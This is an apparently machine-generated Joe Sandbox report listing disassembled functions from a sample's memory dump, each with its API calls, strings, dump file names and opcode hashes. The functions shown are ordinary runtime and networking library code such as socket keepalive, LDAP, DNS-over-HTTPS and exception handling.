    Function 006649F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 111networkCOMMON
    Download Yara Rule
    APIs
    • setsockopt.WS2_32(00664D9D,0000FFFF,00000008,00664D9D,00000004), ref: 00664A48
    • WSAIoctl.WS2_32(00664D9D,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000), ref: 00664AE1
    • WSAGetLastError.WS2_32 ref: 00664AF4
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00664B21
    Strings
    • Failed to set SIO_KEEPALIVE_VALS on fd %d: %d, xrefs: 00664B06
    • Failed to set SO_KEEPALIVE on fd %d, xrefs: 00664A5D
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen$ErrorFailureIoctlLastsetsockopt
    • String ID: Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d
    • API String ID: 2973344180-277924715
    • Opcode ID: e04b38b9c7c1ed0d59ee031419a8aa86ab4acd5c758935b78bb7ab0d0e8fbf5e
    • Instruction ID: 4b8e1d939c0584448f784acd8bf5f95cf55d80fb3716783257651ca14f5bc639
    • Opcode Fuzzy Hash: e04b38b9c7c1ed0d59ee031419a8aa86ab4acd5c758935b78bb7ab0d0e8fbf5e
    • Instruction Fuzzy Hash: 3841A6B5E00208BFDB04DF99D842FED77BAEF49300F108129F919AB291DA759A00CB95
    Function 00640CC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMON
    Download Yara Rule
    APIs
    • std::_Lockit::_Lockit.LIBCPMT ref: 00640CF4
    • std::_Lockit::_Lockit.LIBCPMT ref: 00640D14
    • std::_Lockit::~_Lockit.LIBCPMT ref: 00640D34
    • std::_Facet_Register.LIBCPMT ref: 00640DF8
    • std::_Lockit::~_Lockit.LIBCPMT ref: 00640E10
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
    • String ID: ?qo
    • API String ID: 459529453-996102081
    • Opcode ID: b15e87c1d3c64136345985039f9401f476263b18c16ea56b715a6f456b6c157d
    • Instruction ID: c5beb9650d7fa60bf2f7956cbb7aabf22f99eb0d0ecf7cdd6ce457dc272798e7
    • Opcode Fuzzy Hash: b15e87c1d3c64136345985039f9401f476263b18c16ea56b715a6f456b6c157d
    • Instruction Fuzzy Hash: 6341AC71A04224DFEB24DF94C840BEABBBAEF00714F24815DE9059B381EB75BA45CBC5
    Function 00640B80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102COMMON
    Download Yara Rule
    APIs
    • std::_Lockit::_Lockit.LIBCPMT ref: 00640BAD
    • std::_Lockit::_Lockit.LIBCPMT ref: 00640BCD
    • std::_Lockit::~_Lockit.LIBCPMT ref: 00640BED
    • std::_Facet_Register.LIBCPMT ref: 00640C8B
    • std::_Lockit::~_Lockit.LIBCPMT ref: 00640CA3
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
    • String ID: ?qo
    • API String ID: 459529453-996102081
    • Opcode ID: efa5b0da5c403beecd9b00fffb8bbfefa9a1b85f65ec9542287055fd2b079999
    • Instruction ID: 47ffe720515cac65dad83aff1b651899bca3c62f50a780bbf27bc914cf607e69
    • Opcode Fuzzy Hash: efa5b0da5c403beecd9b00fffb8bbfefa9a1b85f65ec9542287055fd2b079999
    • Instruction Fuzzy Hash: 9A41E671900224DFDB20DF54C880BEABBBAEF10714F24825DE9469B341EB75AD41CBC5
    Function 0063F1E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102COMMON
    Download Yara Rule
    APIs
    • std::_Lockit::_Lockit.LIBCPMT ref: 0063F20D
    • std::_Lockit::_Lockit.LIBCPMT ref: 0063F22D
    • std::_Lockit::~_Lockit.LIBCPMT ref: 0063F24D
    • std::_Facet_Register.LIBCPMT ref: 0063F2EB
    • std::_Lockit::~_Lockit.LIBCPMT ref: 0063F303
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
    • String ID: ?qo
    • API String ID: 459529453-996102081
    • Opcode ID: 0c65f8dcaa99aba3a542cb330638defd47557a9be4a18ed365f02287d318b683
    • Instruction ID: 988c72c25f7757f8b56f5075188bdc76bad6a93dca8c36dfde17c2a95d547d7f
    • Opcode Fuzzy Hash: 0c65f8dcaa99aba3a542cb330638defd47557a9be4a18ed365f02287d318b683
    • Instruction Fuzzy Hash: 8541BD71900215DFCB14DF94C881BEABBBAEF10714F15826DE8069B392EB71AE41CBC5
    Function 0068E5E4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 98COMMON
    Download Yara Rule
    APIs
    • #33.WLDAP32(?,?,?), ref: 0068E5F2
    • #301.WLDAP32(00000000,00000000), ref: 0068E62F
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    • _strlen.LIBCMT ref: 0068E652
    • #35.WLDAP32(00000000,00000000,00000000), ref: 0068E66E
    • #79.WLDAP32(00000000), ref: 0068E6DD
    • #200.WLDAP32(00000000), ref: 0068E701
    • #301.WLDAP32(00000000,00000000), ref: 0068E71F
    • #301.WLDAP32(00000000,00000000), ref: 0068EBAF
    • #41.WLDAP32(00000000), ref: 0068EBD0
    • #46.WLDAP32(00000000), ref: 0068EC1D
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068EC69
    Strings
    • There are more than %d entries, xrefs: 0068EBEE
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: #301$#200CheckFailureStackVars@8_strlen
    • String ID: There are more than %d entries
    • API String ID: 3172481382-741417676
    • Opcode ID: dd2862d014df6d6330ea848dda20b0c6fa3b4aacdaf5ea9cbd502ca56dfb04ae
    • Instruction ID: 89e1beed7d044e6ea6a286a706d26a544e5c0a6162af9331043d3184f1100188
    • Opcode Fuzzy Hash: dd2862d014df6d6330ea848dda20b0c6fa3b4aacdaf5ea9cbd502ca56dfb04ae
    • Instruction Fuzzy Hash: 8631C5B1D00214ABCF24FBA8DD46BDD7376AF45314F244329E829772D1DA355E84CB92
    Function 006777D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 84COMMON
    Download Yara Rule
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 0067781C
    • ___from_strstr_to_strchr.LIBCMT ref: 0067784D
    • ___from_strstr_to_strchr.LIBCMT ref: 0067786B
    Strings
    • The requested URL returned error: %d, xrefs: 006778A8
    • The requested URL returned error: %s, xrefs: 00677886
    • HTTP, xrefs: 006777FD
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ___from_strstr_to_strchr
    • String ID: HTTP$The requested URL returned error: %d$The requested URL returned error: %s
    • API String ID: 601868998-4174864708
    • Opcode ID: 45c70ac2f280a2098c7bbd3d5e3273067d32506f8a0af43d81af4f344ef088b2
    • Instruction ID: 690d23c4789983bb018c87899643ab74a3a1843712237947b628a08670bb1407
    • Opcode Fuzzy Hash: 45c70ac2f280a2098c7bbd3d5e3273067d32506f8a0af43d81af4f344ef088b2
    • Instruction Fuzzy Hash: 573175B5E04248EFDB40DBE8C855BEDBBB6AF45304F1485ACE9186B342E3759B40CB91
    Function 0063C720 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80COMMON
    Download Yara Rule
    APIs
    • __CxxThrowException@8.LIBVCRUNTIME ref: 0063C74D
      • Part of subcall function 006C3ACD: RaiseException.KERNEL32(?,?,006BD8D2,?,?,?,?,?,?,?,?,006BD8D2,?,006FA3D8,00000000,?), ref: 006C3B2D
    • __CxxThrowException@8.LIBVCRUNTIME ref: 0063C78C
    • ___std_exception_copy.LIBVCRUNTIME ref: 0063C7BF
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
    • API String ID: 3941765731-1866435925
    • Opcode ID: 68a009ce4df2d74f2367a39e9932c15574d0516be8b0dfff453ccb28c30304f3
    • Instruction ID: 6ce6d6522e70a0022d62f2dab038fc0c468ab6248e1aa8c1e4e556979fea36d1
    • Opcode Fuzzy Hash: 68a009ce4df2d74f2367a39e9932c15574d0516be8b0dfff453ccb28c30304f3
    • Instruction Fuzzy Hash: EB11E4B29047186BC710DF6CC802BE6B7EAEF15320F14852AFA54E7241E770A914CBE4
    Function 006DB20A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID:
    • String ID: api-ms-$ext-ms-
    • API String ID: 0-537541572
    • Opcode ID: f68a8ca4ca0f4ec684c1e900c3444467db691b064544fc2de0ed710e7bb59fc6
    • Instruction ID: a1cafa632bfe9e89f22858bf81dcfdc4de377495cb1a2adf1bfbbd54fba335cf
    • Opcode Fuzzy Hash: f68a8ca4ca0f4ec684c1e900c3444467db691b064544fc2de0ed710e7bb59fc6
    • Instruction Fuzzy Hash: F1210833E41310EBCB218B259C84ABE37579F01BA0F122112ED59AB399DF70EF0186D1
    Function 006E1736 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
    Download Yara Rule
    APIs
      • Part of subcall function 006E1482: _free.LIBCMT ref: 006E14A7
    • _free.LIBCMT ref: 006E1784
      • Part of subcall function 006D8FB3: HeapFree.KERNEL32(00000000,00000000,?,006E14AC,?,00000000,?,?,?,006E174F,?,00000007,?,?,006E1BF4,?), ref: 006D8FC9
      • Part of subcall function 006D8FB3: GetLastError.KERNEL32(?,?,006E14AC,?,00000000,?,?,?,006E174F,?,00000007,?,?,006E1BF4,?,?), ref: 006D8FDB
    • _free.LIBCMT ref: 006E178F
    • _free.LIBCMT ref: 006E179A
    • _free.LIBCMT ref: 006E17EE
    • _free.LIBCMT ref: 006E17F9
    • _free.LIBCMT ref: 006E1804
    • _free.LIBCMT ref: 006E180F
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: eb066ee0f4ea7307b9f00c00026b2d4c2f6a746266a3ac8be35ee3229553042f
    • Instruction ID: 63b4386f41c7e786c5dbc732c2376c93ab9307c3eddb1afd1f764e65c7b57fe1
    • Opcode Fuzzy Hash: eb066ee0f4ea7307b9f00c00026b2d4c2f6a746266a3ac8be35ee3229553042f
    • Instruction Fuzzy Hash: 2E117231942B44EBD570B7B1CC07FCBB7DF5F01740F404C1DB29A6A292DA38B6059694
    Function 006D7248 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetConsoleCP.KERNEL32(?,00000000,00000000), ref: 006D7290
    • __fassign.LIBCMT ref: 006D746F
    • __fassign.LIBCMT ref: 006D748C
    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006D74D4
    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006D7514
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 006D75C0
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: FileWrite__fassign$ConsoleErrorLast
    • String ID:
    • API String ID: 4031098158-0
    • Opcode ID: 72ec3d1c3fd624cb9422ff15b2513e1f9f2116f95f9bbc98f9dfc516918161cf
    • Instruction ID: 2de90ce8c9de110e714995253e1f77182c703a1755e7b32304b912e95939c4be
    • Opcode Fuzzy Hash: 72ec3d1c3fd624cb9422ff15b2513e1f9f2116f95f9bbc98f9dfc516918161cf
    • Instruction Fuzzy Hash: 03D1AE71D042589FCF15CFE8D8809EDBBB6BF49310F28416AE855BB341EB30AA46CB55
    Function 006D57D1 Relevance: 9.3, APIs: 6, Instructions: 264COMMONLIBRARYCODE
    Download Yara Rule
    APIs
      • Part of subcall function 006D8D61: GetLastError.KERNEL32(006FA414,?,?,006D2BC1,?,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8D66
      • Part of subcall function 006D8D61: SetLastError.KERNEL32(00000000,00000006,000000FF,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8E04
    • _memcmp.LIBVCRUNTIME ref: 006D5A6A
    • _free.LIBCMT ref: 006D5ADE
    • _free.LIBCMT ref: 006D5AF7
    • _free.LIBCMT ref: 006D5B35
    • _free.LIBCMT ref: 006D5B3E
    • _free.LIBCMT ref: 006D5B4A
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free$ErrorLast$_memcmp
    • String ID:
    • API String ID: 4275183328-0
    • Opcode ID: 43fffded795d55bb90b449eabc569abcd655db8cffbd766fe9b578d736bf1a10
    • Instruction ID: 43167c4bb3a1f60a7f054a445e3155236edfe54ac1c29c396b2d159874c9f219
    • Opcode Fuzzy Hash: 43fffded795d55bb90b449eabc569abcd655db8cffbd766fe9b578d736bf1a10
    • Instruction Fuzzy Hash: C6B12B75D016299FDB24DF18C894AADB7B6FF58304F1445AEE80AA7750D730AE90CF40
    Function 006AA3D0 Relevance: 9.2, APIs: 6, Instructions: 175COMMON
    Download Yara Rule
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 006AA421
    • ___from_strstr_to_strchr.LIBCMT ref: 006AA438
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006AA5E6
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ___from_strstr_to_strchr$CheckStackVars@8
    • String ID:
    • API String ID: 2899561186-0
    • Opcode ID: e87c7c2c95575a1092f18b876750497bf8770de76ac3f108ce4ed68587527440
    • Instruction ID: 23fe6e607edbd26407a9efd5d5a00af458a7ad96ca1c4b672121ebf4c8e8f4a4
    • Opcode Fuzzy Hash: e87c7c2c95575a1092f18b876750497bf8770de76ac3f108ce4ed68587527440
    • Instruction Fuzzy Hash: 38613DB0D002489FDF00EFE8D945BEEBBB6EB49304F108529E8056B341D7759A45CFA6
    Function 006A8D50 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 396COMMON
    Download Yara Rule
    APIs
    • _strlen.LIBCMT ref: 006A8D9B
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006A927E
      • Part of subcall function 00683DA0: _strlen.LIBCMT ref: 00683DF9
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: DIGEST-MD5 handshake failure (empty challenge message)$WDigest$WDigest
    • API String ID: 3286693010-3442488022
    • Opcode ID: a15f41cec4b30c74fed67b6ad90ed501c9fda063d162aefe4af40fb7881d9568
    • Instruction ID: 6928e500eda7fd395948308adf663aaa9389b8c7a7c33498efcd826d9e541dc8
    • Opcode Fuzzy Hash: a15f41cec4b30c74fed67b6ad90ed501c9fda063d162aefe4af40fb7881d9568
    • Instruction Fuzzy Hash: 78E1A1B1D00224DFDB64EF98DC46BDEB376AB49300F144268E90977241DB34AE80CFA6
    Function 00651110 Relevance: 9.1, APIs: 6, Instructions: 141COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen
    • String ID:
    • API String ID: 4218353326-0
    • Opcode ID: 890814179610c54c014ed9723ba6e75a7ba11e8753ecad687850bcbbab83c8a5
    • Instruction ID: be49b80d6fe44e71a29777e914406e82492ed2b91037b9900cff4f38f86dd781
    • Opcode Fuzzy Hash: 890814179610c54c014ed9723ba6e75a7ba11e8753ecad687850bcbbab83c8a5
    • Instruction Fuzzy Hash: 4F51E9B4D00209EFCB14DF98D594BEEBBB2BB45315F208698D815AB380D375AE85CF91
    Function 006AB0E0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 314COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006AB527
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8$_strlen
    • String ID: Could not DOH-resolve: %s$DOH Host name: %s$DOH: %s type %s for %s$DOH: %s type %s for %s
    • API String ID: 572576967-1638338986
    • Opcode ID: 2656a6ebb3c7ed3deeaaf47b1d326a7ef5d795d95f8824f7f9a54137385d3af0
    • Instruction ID: 2d2756b3f7b93ccb8e6233d5f9dcfbcb025ada1b839cfd9b49c5ab3f7b19d424
    • Opcode Fuzzy Hash: 2656a6ebb3c7ed3deeaaf47b1d326a7ef5d795d95f8824f7f9a54137385d3af0
    • Instruction Fuzzy Hash: 87D174B5E00108ABDB54EB94D895FEE77B6EB84304F0481BCE5099B382D735AE85CF90
    Function 006A0650 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 292COMMON
    Download Yara Rule
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 006A068D
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006A0A2C
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8___from_strstr_to_strchr
    • String ID: *$Can't get the size of %s$Can't open %s for writing
    • API String ID: 88142382-3405668039
    • Opcode ID: 8ba1e506bac17ba58bcfb7c42255d58ab3a6a18fe16c757e2ff5bc1bffa2ee83
    • Instruction ID: cbe2ab1317ca8b33466cab6997f424601e2d3a43ee2011ab4317b30057e468ef
    • Opcode Fuzzy Hash: 8ba1e506bac17ba58bcfb7c42255d58ab3a6a18fe16c757e2ff5bc1bffa2ee83
    • Instruction Fuzzy Hash: A3D10BB5E002099FDB54DF94C880BEEB7B6BF49300F148169E509AB342D735AD82CF91
